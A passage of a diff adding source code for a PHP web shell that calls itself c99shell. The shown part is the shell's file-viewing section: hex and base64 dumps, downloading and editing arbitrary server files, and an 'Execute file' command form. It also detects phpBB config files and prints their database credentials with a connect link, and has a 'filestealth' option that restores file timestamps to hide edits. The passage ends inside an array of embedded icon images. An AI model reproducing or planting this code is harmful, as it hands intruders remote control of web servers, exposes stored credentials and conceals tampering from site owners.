+   array("<img src=\"".$surl."act=img&img=ext_txt\" border=\"0\">","txt"), 
+   array("Code","code"), 
+   array("Session","phpsess"), 
+   array("<img src=\"".$surl."act=img&img=ext_exe\" border=\"0\">","exe"), 
+   array("SDB","sdb"), 
+   array("<img src=\"".$surl."act=img&img=ext_gif\" border=\"0\">","img"), 
+   array("<img src=\"".$surl."act=img&img=ext_ini\" border=\"0\">","ini"), 
+   array("<img src=\"".$surl."act=img&img=download\" border=\"0\">","download"), 
+   array("<img src=\"".$surl."act=img&img=ext_rtf\" border=\"0\">","notepad"), 
+   array("<img src=\"".$surl."act=img&img=change\" border=\"0\">","edit") 
+  ); 
+  echo "<b>Viewing file:&nbsp;&nbsp;&nbsp;&nbsp;<img src=\"".$surl."act=img&img=ext_".$ext."\" border=\"0\">&nbsp;".$f." (".view_size(filesize($d.$f)).") &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;".view_perms_color($d.$f)."</b><br>Select action/file-type:<br>"; 
+  foreach($arr as $t) 
+  { 
+   if ($t[1] == $rft) {echo " <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."\"><font color=green>".$t[0]."</font></a>";} 
+   elseif ($t[1] == $ft) {echo " <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."\"><b><u>".$t[0]."</u></b></a>";} 
+   else {echo " <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."\"><b>".$t[0]."</b></a>";} 
+   echo " (<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&white=1&d=".urlencode($d)."\" target=\"_blank\">+</a>) |"; 
+  } 
+  echo "<hr size=\"1\" noshade>"; 
+  if ($ft == "info") 
+  { 
+   echo "<b>Information:</b><table border=0 cellspacing=1 cellpadding=2><tr><td><b>Path</b></td><td> ".$d.$f."</td></tr><tr><td><b>Size</b></td><td> ".view_size(filesize($d.$f))."</td></tr><tr><td><b>MD5</b></td><td> ".md5_file($d.$f)."</td></tr>"; 
+   if (!$win) 
+   { 
+    echo "<tr><td><b>Owner/Group</b></td><td> ";     
+    $ow = posix_getpwuid(fileowner($d.$f)); 
+    $gr = posix_getgrgid(filegroup($d.$f)); 
+    echo ($ow["name"]?$ow["name"]:fileowner($d.$f))."/".($gr["name"]?$gr["name"]:filegroup($d.$f)); 
+   } 
+   echo "<tr><td><b>Perms</b></td><td><a href=\"".$surl."act=chmod&f=".urlencode($f)."&d=".urlencode($d)."\">".view_perms_color($d.$f)."</a></td></tr><tr><td><b>Create time</b></td><td> ".date("d/m/Y H:i:s",filectime($d.$f))."</td></tr><tr><td><b>Access time</b></td><td> ".date("d/m/Y H:i:s",fileatime($d.$f))."</td></tr><tr><td><b>MODIFY time</b></td><td> ".date("d/m/Y H:i:s",filemtime($d.$f))."</td></tr></table><br>"; 
+   $fi = fopen($d.$f,"rb"); 
+   if ($fi) 
+   { 
+    if ($fullhexdump) {echo "<b>FULL HEXDUMP</b>"; $str = fread($fi,filesize($d.$f));} 
+    else {echo "<b>HEXDUMP PREVIEW</b>"; $str = fread($fi,$hexdump_lines*$hexdump_rows);} 
+    $n = 0; 
+    $a0 = "00000000<br>"; 
+    $a1 = ""; 
+    $a2 = ""; 
+    for ($i=0; $i<strlen($str); $i++) 
+    { 
+     $a1 .= sprintf("%02X",ord($str[$i]))." "; 
+     switch (ord($str[$i])) 
+     { 
+      case 0:  $a2 .= "<font>0</font>"; break; 
+      case 32: 
+      case 10: 
+      case 13: $a2 .= "&nbsp;"; break; 
+      default: $a2 .= htmlspecialchars($str[$i]); 
+     } 
+     $n++; 
+     if ($n == $hexdump_rows) 
+     { 
+      $n = 0; 
+      if ($i+1 < strlen($str)) {$a0 .= sprintf("%08X",$i+1)."<br>";} 
+      $a1 .= "<br>"; 
+      $a2 .= "<br>"; 
+     } 
+    } 
+    //if ($a1 != "") {$a0 .= sprintf("%08X",$i)."<br>";} 
+    echo "<table border=0 bgcolor=#666666 cellspacing=1 cellpadding=4><tr><td bgcolor=#666666>".$a0."</td><td bgcolor=000000>".$a1."</td><td bgcolor=000000>".$a2."</td></tr></table><br>"; 
+   } 
+   $encoded = ""; 
+   if ($base64 == 1) 
+   { 
+    echo "<b>Base64 Encode</b><br>"; 
+    $encoded = base64_encode(file_get_contents($d.$f)); 
+   } 
+   elseif($base64 == 2) 
+   { 
+    echo "<b>Base64 Encode + Chunk</b><br>"; 
+    $encoded = chunk_split(base64_encode(file_get_contents($d.$f))); 
+   } 
+   elseif($base64 == 3) 
+   { 
+    echo "<b>Base64 Encode + Chunk + Quotes</b><br>"; 
+    $encoded = base64_encode(file_get_contents($d.$f)); 
+    $encoded = substr(preg_replace("!.{1,76}!","'\\0'.\n",$encoded),0,-2); 
+   } 
+   elseif($base64 == 4) 
+   { 
+    $text = file_get_contents($d.$f); 
+    $encoded = base64_decode($text); 
+    echo "<b>Base64 Decode"; 
+    if (base64_encode($encoded) != $text) {echo " (failed)";} 
+    echo "</b><br>"; 
+   } 
+   if (!empty($encoded)) 
+   { 
+    echo "<textarea cols=80 rows=10>".htmlspecialchars($encoded)."</textarea><br><br>"; 
+   } 
+   echo "<b>HEXDUMP:</b><nobr> [<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&fullhexdump=1&d=".urlencode($d)."\">Full</a>] [<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&d=".urlencode($d)."\">Preview</a>]<br><b>Base64: </b> 
+<nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=1&d=".urlencode($d)."\">Encode</a>]&nbsp;</nobr> 
+<nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=2&d=".urlencode($d)."\">+chunk</a>]&nbsp;</nobr> 
+<nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=3&d=".urlencode($d)."\">+chunk+quotes</a>]&nbsp;</nobr> 
+<nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=4&d=".urlencode($d)."\">Decode</a>]&nbsp;</nobr> 
+<P>"; 
+  } 
+  elseif ($ft == "html") 
+  { 
+   if ($white) {@ob_clean();} 
+   echo $r; 
+   if ($white) {c99shexit();} 
+  } 
+  elseif ($ft == "txt") {echo "<pre>".htmlspecialchars($r)."</pre>";} 
+  elseif ($ft == "ini") {echo "<pre>"; var_dump(parse_ini_file($d.$f,TRUE)); echo "</pre>";} 
+  elseif ($ft == "phpsess") 
+  { 
+   echo "<pre>"; 
+   $v = explode("|",$r); 
+   echo $v[0]."<br>"; 
+   var_dump(unserialize($v[1])); 
+   echo "</pre>"; 
+  } 
+  elseif ($ft == "exe") 
+  { 
+   $ext = explode(".",$f); 
+   $c = count($ext)-1; 
+   $ext = $ext[$c]; 
+   $ext = strtolower($ext); 
+   $rft = ""; 
+   foreach($exeftypes as $k=>$v) 
+   { 
+    if (in_array($ext,$v)) {$rft = $k; break;} 
+   } 
+   $cmd = str_replace("%f%",$f,$rft); 
+   echo "<b>Execute file:</b><form action=\"".$surl."\" method=POST><input type=hidden name=act value=cmd><input type=\"text\" name=\"cmd\" value=\"".htmlspecialchars($cmd)."\" size=\"".(strlen($cmd)+2)."\"><br>Display in text-area<input type=\"checkbox\" name=\"cmd_txt\" value=\"1\" checked><input type=hidden name=\"d\" value=\"".htmlspecialchars($d)."\"><br><input type=submit name=submit value=\"Execute\"></form>"; 
+  } 
+  elseif ($ft == "sdb") {echo "<pre>"; var_dump(unserialize(base64_decode($r))); echo "</pre>";} 
+  elseif ($ft == "code") 
+  { 
+   if (ereg("php"."BB 2.(.*) auto-generated config file",$r)) 
+   { 
+    $arr = explode("\n",$r); 
+    if (count($arr == 18)) 
+    { 
+     include($d.$f); 
+     echo "<b>phpBB configuration is detected in this file!<br>"; 
+     if ($dbms == "mysql4") {$dbms = "mysql";} 
+     if ($dbms == "mysql") {echo "<a href=\"".$surl."act=sql&sql_server=".htmlspecialchars($dbhost)."&sql_login=".htmlspecialchars($dbuser)."&sql_passwd=".htmlspecialchars($dbpasswd)."&sql_port=3306&sql_db=".htmlspecialchars($dbname)."\"><b><u>Connect to DB</u></b></a><br><br>";} 
+     else {echo "But, you can't connect to forum sql-base, because db-software=\"".$dbms."\" is not supported by c99shell. Please, report us for fix.";} 
+     echo "Parameters for manual connect:<br>"; 
+     $cfgvars = array("dbms"=>$dbms,"dbhost"=>$dbhost,"dbname"=>$dbname,"dbuser"=>$dbuser,"dbpasswd"=>$dbpasswd); 
+     foreach ($cfgvars as $k=>$v) {echo htmlspecialchars($k)."='".htmlspecialchars($v)."'<br>";} 
+     echo "</b><hr size=\"1\" noshade>"; 
+    } 
+   } 
+   echo "<div style=\"border : 0px solid #FFFFFF; padding: 1em; margin-top: 1em; margin-bottom: 1em; margin-right: 1em; margin-left: 1em; background-color: ".$highlight_background .";\">"; 
+   if (!empty($white)) {@ob_clean();} 
+   highlight_file($d.$f); 
+   if (!empty($white)) {c99shexit();} 
+   echo "</div>"; 
+  } 
+  elseif ($ft == "download") 
+  { 
+   @ob_clean(); 
+   header("Content-type: application/octet-stream"); 
+   header("Content-length: ".filesize($d.$f)); 
+   header("Content-disposition: attachment; filename=\"".$f."\";"); 
+   echo $r; 
+   exit; 
+  } 
+  elseif ($ft == "notepad") 
+  { 
+   @ob_clean(); 
+   header("Content-type: text/plain"); 
+   header("Content-disposition: attachment; filename=\"".$f.".txt\";"); 
+   echo($r); 
+   exit; 
+  } 
+  elseif ($ft == "img") 
+  { 
+   $inf = getimagesize($d.$f); 
+   if (!$white) 
+   { 
+    if (empty($imgsize)) {$imgsize = 20;} 
+    $width = $inf[0]/100*$imgsize; 
+    $height = $inf[1]/100*$imgsize; 
+    echo "<center><b>Size:</b>&nbsp;"; 
+    $sizes = array("100","50","20"); 
+    foreach ($sizes as $v) 
+    { 
+     echo "<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=img&d=".urlencode($d)."&imgsize=".$v."\">"; 
+     if ($imgsize != $v ) {echo $v;} 
+     else {echo "<u>".$v."</u>";} 
+     echo "</a>&nbsp;&nbsp;&nbsp;"; 
+    } 
+    echo "<br><br><img src=\"".$surl."act=f&f=".urlencode($f)."&ft=img&white=1&d=".urlencode($d)."\" width=\"".$width."\" height=\"".$height."\" border=\"1\"></center>"; 
+   } 
+   else 
+   { 
+    @ob_clean(); 
+    $ext = explode($f,"."); 
+    $ext = $ext[count($ext)-1]; 
+    header("Content-type: ".$inf["mime"]); 
+    readfile($d.$f); 
+    exit; 
+   } 
+  } 
+  elseif ($ft == "edit") 
+  { 
+   if (!empty($submit)) 
+   { 
+    if ($filestealth) {$stat = stat($d.$f);} 
+    $fp = fopen($d.$f,"w"); 
+    if (!$fp) {echo "<b>Can't write to file!</b>";} 
+    else 
+    { 
+     echo "<b>Saved!</b>"; 
+     fwrite($fp,$edit_text); 
+     fclose($fp); 
+     if ($filestealth) {touch($d.$f,$stat[9],$stat[8]);} 
+     $r = $edit_text; 
+    } 
+   } 
+   $rows = count(explode("\r\n",$r)); 
+   if ($rows < 10) {$rows = 10;} 
+   if ($rows > 30) {$rows = 30;} 
+   echo "<form action=\"".$surl."act=f&f=".urlencode($f)."&ft=edit&d=".urlencode($d)."\" method=POST><input type=submit name=submit value=\"Save\">&nbsp;<input type=\"reset\" value=\"Reset\">&nbsp;<input type=\"button\" onclick=\"location.href='".addslashes($surl."act=ls&d=".substr($d,0,-1))."';\" value=\"Back\"><br><textarea name=\"edit_text\" cols=\"122\" rows=\"".$rows."\">".htmlspecialchars($r)."</textarea></form>"; 
+  } 
+  elseif (!empty($ft)) {echo "<center><b>Manually selected type is incorrect. If you think, it is mistake, please send us url and dump of \$GLOBALS.</b></center>";} 
+  else {echo "<center><b>Unknown extension (".$ext."), please, select type manually.</b></center>";} 
+ } 
+} 
+} 
+else 
+{ 
+ @ob_clean(); 
+ $images = array( 
+"arrow_ltr"=> 
+"R0lGODlhJgAWAIAAAAAAAP///yH5BAUUAAEALAAAAAAmABYAAAIvjI+py+0PF4i0gVvzuVxXDnoQ". 
+"SIrUZGZoerKf28KjPNPOaku5RfZ+uQsKh8RiogAAOw==", 
+"back"=> 
+"R0lGODlhFAAUAKIAAAAAAP///93d3cDAwIaGhgQEBP///wAAACH5BAEAAAYALAAAAAAUABQAAAM8". 
+"aLrc/jDKSWWpjVysSNiYJ4CUOBJoqjniILzwuzLtYN/3zBSErf6kBW+gKRiPRghPh+EFK0mOUEqt". 
+"Wg0JADs=", 
+"buffer"=> 
+"R0lGODlhFAAUAKIAAAAAAP////j4+N3d3czMzLKysoaGhv///yH5BAEAAAcALAAAAAAUABQAAANo". 
+"eLrcribG90y4F1Amu5+NhY2kxl2CMKwrQRSGuVjp4LmwDAWqiAGFXChg+xhnRB+ptLOhai1crEmD". 
+"Dlwv4cEC46mi2YgJQKaxsEGDFnnGwWDTEzj9jrPRdbhuG8Cr/2INZIOEhXsbDwkAOw==", 
+"change"=> 
+"R0lGODlhFAAUAMQfAL3hj7nX+pqo1ejy/f7YAcTb+8vh+6FtH56WZtvr/RAQEZecx9Ll/PX6/v3+". 
+"/3eHt6q88eHu/ZkfH3yVyIuQt+72/kOm99fo/P8AZm57rkGS4Hez6pil9oep3GZmZv///yH5BAEA". 
+"AB8ALAAAAAAUABQAAAWf4CeOZGme6NmtLOulX+c4TVNVQ7e9qFzfg4HFonkdJA5S54cbRAoFyEOC". 
+"wSiUtmYkkrgwOAeA5zrqaLldBiNMIJeD266XYTgQDm5Rx8mdG+oAbSYdaH4Ga3c8JBMJaXQGBQgA". 
+"CHkjE4aQkQ0AlSITan+ZAQqkiiQPj1AFAaMKEKYjD39QrKwKAa8nGQK8Agu/CxTCsCMexsfIxjDL". 
+"zMshADs=", 
+"delete"=> 
+"R0lGODlhFAAUAOZZAPz8/NPFyNgHLs0YOvPz8/b29sacpNXV1fX19cwXOfDw8Kenp/n5+etgeunp". 
+"6dcGLMMpRurq6pKSktvb2+/v7+1wh3R0dPnP17iAipxyel9fX7djcscSM93d3ZGRkeEsTevd4LCw". 
+"sGRkZGpOU+IfQ+EQNoh6fdIcPeHh4YWFhbJQYvLy8ui+xm5ubsxccOx8kcM4UtY9WeAdQYmJifWv". 
+"vHx8fMnJycM3Uf3v8rRue98ONbOzs9YFK5SUlKYoP+Tk5N0oSufn57ZGWsQrR9kIL5CQkOPj42Vl". 
+"ZeAPNudAX9sKMPv7+15QU5ubm39/f8e5u4xiatra2ubKz8PDw+pfee9/lMK0t81rfd8AKf///wAA". 
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5". 
+"BAEAAFkALAAAAAAUABQAAAesgFmCg4SFhoeIhiUfIImIMlgQB46GLAlYQkaFVVhSAIZLT5cbEYI4". 
+"STo5MxOfhQwBA1gYChckQBk1OwiIALACLkgxJilTBI69RFhDFh4HDJRZVFgPPFBR0FkNWDdMHA8G". 
+"BZTaMCISVgMC4IkVWCcaPSi96OqGNFhKI04dgr0QWFcKDL3A4uOIjVZZABxQIWDBLkIEQrRoQsHQ". 
+"jwVFHBgiEGQFIgQasYkcSbJQIAA7", 
+"download"=> 
+"R0lGODlhFAAUALMIAAD/AACAAIAAAMDAwH9/f/8AAP///wAAAP///wAAAAAAAAAAAAAAAAAAAAAA". 
+"AAAAACH5BAEAAAgALAAAAAAUABQAAAROEMlJq704UyGOvkLhfVU4kpOJSpx5nF9YiCtLf0SuH7pu". 
+"EYOgcBgkwAiGpHKZzB2JxADASQFCidQJsMfdGqsDJnOQlXTP38przWbX3qgIADs=", 
+"forward"=> 
+"R0lGODlhFAAUAPIAAAAAAP///93d3cDAwIaGhgQEBP///wAAACH5BAEAAAYALAAAAAAUABQAAAM8". 
+"aLrc/jDK2Qp9xV5WiN5G50FZaRLD6IhE66Lpt3RDbd9CQFSE4P++QW7He7UKPh0IqVw2l0RQSEqt". 
+"WqsJADs=", 
+"home"=> 
+"R0lGODlhFAAUALMAAAAAAP///+rq6t3d3czMzLKysoaGhmZmZgQEBP///wAAAAAAAAAAAAAAAAAA". 
+"AAAAACH5BAEAAAkALAAAAAAUABQAAAR+MMk5TTWI6ipyMoO3cUWRgeJoCCaLoKO0mq0ZxjNSBDWS". 
+"krqAsLfJ7YQBl4tiRCYFSpPMdRRCoQOiL4i8CgZgk09WfWLBYZHB6UWjCequwEDHuOEVK3QtgN/j". 
+"VwMrBDZvgF+ChHaGeYiCBQYHCH8VBJaWdAeSl5YiW5+goBIRADs=", 
+"mode"=> 
+"R0lGODlhHQAUALMAAAAAAP///6CgpN3d3czMzIaGhmZmZl9fX////wAAAAAAAAAAAAAAAAAAAAAA". 
+"AAAAACH5BAEAAAgALAAAAAAdABQAAASBEMlJq70461m6/+AHZMUgnGiqniNWHHAsz3F7FUGu73xO". 
+"2BZcwGDoEXk/Uq4ICACeQ6fzmXTlns0ddle99b7cFvYpER55Z10Xy1lKt8wpoIsACrdaqBpYEYK/". 
+"dH1LRWiEe0pRTXBvVHwUd3o6eD6OHASXmJmamJUSY5+gnxujpBIRADs=", 
+"refresh"=> 
+"R0lGODlhEQAUALMAAAAAAP////Hx8erq6uPj493d3czMzLKysoaGhmZmZl9fXwQEBP///wAAAAAA". 
+"AAAAACH5BAEAAAwALAAAAAARABQAAAR1kMlJq0Q460xR+GAoIMvkheIYlMyJBkJ8lm6YxMKi6zWY". 
+"3AKCYbjo/Y4EQqFgKIYUh8EvuWQ6PwPFQJpULpunrXZLrYKx20G3oDA7093Esv19q5O/woFu9ZAJ". 
+"R3lufmWCVX13h3KHfWWMjGBDkpOUTTuXmJgRADs=", 
+"search"=> 
+"R0lGODlhFAAUALMAAAAAAP///+rq6t3d3czMzMDAwLKysoaGhnd3d2ZmZl9fX01NTSkpKQQEBP//". 
+"/wAAACH5BAEAAA4ALAAAAAAUABQAAASn0Ml5qj0z5xr6+JZGeUZpHIqRNOIRfIYiy+a6vcOpHOap". 
+"s5IKQccz8XgK4EGgQqWMvkrSscylhoaFVmuZLgUDAnZxEBMODSnrkhiSCZ4CGrUWMA+LLDxuSHsD". 
+"AkN4C3sfBX10VHaBJ4QfA4eIU4pijQcFmCVoNkFlggcMRScNSUCdJyhoDasNZ5MTDVsXBwlviRmr". 
+"Cbq7C6sIrqawrKwTv68iyA6rDhEAOw==", 
+"setup"=> 
+"R0lGODlhFAAUAMQAAAAAAP////j4+OPj493d3czMzMDAwLKyspaWloaGhnd3d2ZmZl9fX01NTUJC". 
+"QhwcHP///wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEA". 
+"ABAALAAAAAAUABQAAAWVICSKikKWaDmuShCUbjzMwEoGhVvsfHEENRYOgegljkeg0PF4KBIFRMIB". 
+"qCaCJ4eIGQVoIVWsTfQoXMfoUfmMZrgZ2GNDPGII7gJDLYErwG1vgW8CCQtzgHiJAnaFhyt2dwQE". 
+"OwcMZoZ0kJKUlZeOdQKbPgedjZmhnAcJlqaIqUesmIikpEixnyJhulUMhg24aSO6YyEAOw==", 
+"small_dir"=> 
+"R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAAAAAAAAAAAAA". 
+"AAAAACH5BAEAAAgALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdEoMqCebp". 
+"/4YchffzGQhH4YRYPB2DOlHPiKwqd1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs=", 
+"small_unk"=> 
+"R0lGODlhEAAQAHcAACH5BAEAAJUALAAAAAAQABAAhwAAAIep3BE9mllic3B5iVpjdMvh/MLc+y1U". 
+"p9Pm/GVufc7j/MzV/9Xm/EOm99bn/Njp/a7Q+tTm/LHS+eXw/t3r/Nnp/djo/Nrq/fj7/9vq/Nfo". 
+"/Mbe+8rh/Mng+7jW+rvY+r7Z+7XR9dDk/NHk/NLl/LTU+rnX+8zi/LbV++fx/e72/vH3/vL4/u31". 
+"/e31/uDu/dzr/Orz/eHu/fX6/vH4/v////v+/3ez6vf7//T5/kGS4Pv9/7XV+rHT+r/b+rza+vP4". 
+"/uz0/urz/u71/uvz/dTn/M/k/N3s/dvr/cjg+8Pd+8Hc+sff+8Te+/D2/rXI8rHF8brM87fJ8nmP". 
+"wr3N86/D8KvB8F9neEFotEBntENptENptSxUpx1IoDlfrTRcrZeeyZacxpmhzIuRtpWZxIuOuKqz". 
+"9ZOWwX6Is3WIu5im07rJ9J2t2Zek0m57rpqo1nKCtUVrtYir3vf6/46v4Yuu4WZvfr7P6sPS6sDQ". 
+"66XB6cjZ8a/K79/s/dbn/ezz/czd9mN0jKTB6ai/76W97niXz2GCwV6AwUdstXyVyGSDwnmYz4io". 
+"24Oi1a3B45Sy4ae944Ccz4Sj1n2GlgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
+"AAjnACtVCkCw4JxJAQQqFBjAxo0MNGqsABQAh6CFA3nk0MHiRREVDhzsoLQwAJ0gT4ToecSHAYMz". 
+"aQgoDNCCSB4EAnImCiSBjUyGLobgXBTpkAA5I6pgmSkDz5cuMSz8yWlAyoCZFGb4SQKhASMBXJpM". 
+"uSrQEQwkGjYkQCTAy6AlUMhWklQBw4MEhgSA6XPgRxS5ii40KLFgi4BGTEKAsCKXihESCzrsgSQC". 
+"yIkUV+SqOYLCA4csAup86OGDkNw4BpQ4OaBFgB0TEyIUKqDwTRs4a9yMCSOmDBoyZu4sJKCgwIDj". 
+"yAsokBkQADs=", 
+"multipage"=>"R0lGODlhCgAMAJEDAP/////3mQAAAAAAACH5BAEAAAMALAAAAAAKAAwAAAIj3IR". 
+"pJhCODnovidAovBdMzzkixlXdlI2oZpJWEsSywLzRUAAAOw==", 
+"sort_asc"=> 
+"R0lGODlhDgAJAKIAAAAAAP///9TQyICAgP///wAAAAAAAAAAACH5BAEAAAQALAAAAAAOAAkAAAMa". 
+"SLrcPcE9GKUaQlQ5sN5PloFLJ35OoK6q5SYAOw==", 
+"sort_desc"=> 
+"R0lGODlhDgAJAKIAAAAAAP///9TQyICAgP///wAAAAAAAAAAACH5BAEAAAQALAAAAAAOAAkAAAMb". 
+"SLrcOjBCB4UVITgyLt5ch2mgSJZDBi7p6hIJADs=", 
+"sql_button_drop"=> 
+"R0lGODlhCQALAPcAAAAAAIAAAACAAICAAAAAgIAAgACAgICAgMDAwP8AAAD/AP//AAAA//8A/wD/". 
+"/////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMwAAZgAAmQAAzAAA/wAzAAAzMwAzZgAzmQAzzAAz/wBm". 
+"AABmMwBmZgBmmQBmzABm/wCZAACZMwCZZgCZmQCZzACZ/wDMAADMMwDMZgDMmQDMzADM/wD/AAD/". 
+"MwD/ZgD/mQD/zAD//zMAADMAMzMAZjMAmTMAzDMA/zMzADMzMzMzZjMzmTMzzDMz/zNmADNmMzNm". 
+"ZjNmmTNmzDNm/zOZADOZMzOZZjOZmTOZzDOZ/zPMADPMMzPMZjPMmTPMzDPM/zP/ADP/MzP/ZjP/". 
+"mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYzmWYzzGYz/2ZmAGZmM2ZmZmZmmWZm". 
+"zGZm/2aZAGaZM2aZZmaZmWaZzGaZ/2bMAGbMM2bMZmbMmWbMzGbM/2b/AGb/M2b/Zmb/mWb/zGb/". 
+"/5kAAJkAM5kAZpkAmZkAzJkA/5kzAJkzM5kzZpkzmZkzzJkz/5lmAJlmM5lmZplmmZlmzJlm/5mZ". 
+"AJmZM5mZZpmZmZmZzJmZ/5nMAJnMM5nMZpnMmZnMzJnM/5n/AJn/M5n/Zpn/mZn/zJn//8wAAMwA". 
+"M8wAZswAmcwAzMwA/8wzAMwzM8wzZswzmcwzzMwz/8xmAMxmM8xmZsxmmcxmzMxm/8yZAMyZM8yZ". 
+"ZsyZmcyZzMyZ/8zMAMzMM8zMZszMmczMzMzM/8z/AMz/M8z/Zsz/mcz/zMz///8AAP8AM/8AZv8A". 
+"mf8AzP8A//8zAP8zM/8zZv8zmf8zzP8z//9mAP9mM/9mZv9mmf9mzP9m//+ZAP+ZM/+ZZv+Zmf+Z". 
+"zP+Z///MAP/MM//MZv/Mmf/MzP/M////AP//M///Zv//mf//zP///yH5BAEAABAALAAAAAAJAAsA". 
+"AAg4AP8JREFQ4D+CCBOi4MawITeFCg/iQhEPxcSBlFCoQ5Fx4MSKv1BgRGGMo0iJFC2ehHjSoMt/". 
+"AQEAOw==", 
+"sql_button_empty"=> 
+"R0lGODlhCQAKAPcAAAAAAIAAAACAAICAAAAAgIAAgACAgICAgMDAwP8AAAD/AP//AAAA//8A/wD/". 
+"/////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMwAAZgAAmQAAzAAA/wAzAAAzMwAzZgAzmQAzzAAz/wBm". 
+"AABmMwBmZgBmmQBmzABm/wCZAACZMwCZZgCZmQCZzACZ/wDMAADMMwDMZgDMmQDMzADM/wD/AAD/". 
+"MwD/ZgD/mQD/zAD//zMAADMAMzMAZjMAmTMAzDMA/zMzADMzMzMzZjMzmTMzzDMz/zNmADNmMzNm". 
+"ZjNmmTNmzDNm/zOZADOZMzOZZjOZmTOZzDOZ/zPMADPMMzPMZjPMmTPMzDPM/zP/ADP/MzP/ZjP/". 
+"mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYzmWYzzGYz/2ZmAGZmM2ZmZmZmmWZm". 
+"zGZm/2aZAGaZM2aZZmaZmWaZzGaZ/2bMAGbMM2bMZmbMmWbMzGbM/2b/AGb/M2b/Zmb/mWb/zGb/". 
+"/5kAAJkAM5kAZpkAmZkAzJkA/5kzAJkzM5kzZpkzmZkzzJkz/5lmAJlmM5lmZplmmZlmzJlm/5mZ". 
+"AJmZM5mZZpmZmZmZzJmZ/5nMAJnMM5nMZpnMmZnMzJnM/5n/AJn/M5n/Zpn/mZn/zJn//8wAAMwA". 
+"M8wAZswAmcwAzMwA/8wzAMwzM8wzZswzmcwzzMwz/8xmAMxmM8xmZsxmmcxmzMxm/8yZAMyZM8yZ". 
+"ZsyZmcyZzMyZ/8zMAMzMM8zMZszMmczMzMzM/8z/AMz/M8z/Zsz/mcz/zMz///8AAP8AM/8AZv8A". 
+"mf8AzP8A//8zAP8zM/8zZv8zmf8zzP8z//9mAP9mM/9mZv9mmf9mzP9m//+ZAP+ZM/+ZZv+Zmf+Z". 
+"zP+Z///MAP/MM//MZv/Mmf/MzP/M////AP//M///Zv//mf//zP///yH5BAEAABAALAAAAAAJAAoA". 
+"AAgjAP8JREFQ4D+CCBOiMMhQocKDEBcujEiRosSBFjFenOhwYUAAOw==", 
+"sql_button_insert"=> 
+"R0lGODlhDQAMAPcAAAAAAIAAAACAAICAAAAAgIAAgACAgICAgMDAwP8AAAD/AP//AAAA//8A/wD/". 
+"/////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". 
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMwAAZgAAmQAAzAAA/wAzAAAzMwAzZgAzmQAzzAAz/wBm". 
+"AABmMwBmZgBmmQBmzABm/wCZAACZMwCZZgCZmQCZzACZ/wDMAADMMwDMZgDMmQDMzADM/wD/AAD/". 
+"MwD/ZgD/mQD/zAD//zMAADMAMzMAZjMAmTMAzDMA/zMzADMzMzMzZjMzmTMzzDMz/zNmADNmMzNm". 
+"ZjNmmTNmzDNm/zOZADOZMzOZZjOZmTOZzDOZ/zPMADPMMzPMZjPMmTPMzDPM/zP/ADP/MzP/ZjP/". 
+"mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYzmWYzzGYz/2ZmAGZmM2ZmZmZmmWZm". 
+"zGZm/2aZAGaZM2aZZmaZmWaZzGaZ/2bMAGbMM2bMZmbMmWbMzGbM/2b/AGb/M2b/Zmb/mWb/zGb/". 
+"/5kAAJkAM5kAZpkAmZkAzJkA/5kzAJkzM5kzZpkzmZkzzJkz/5lmAJlmM5lmZplmmZlmzJlm/5mZ". 
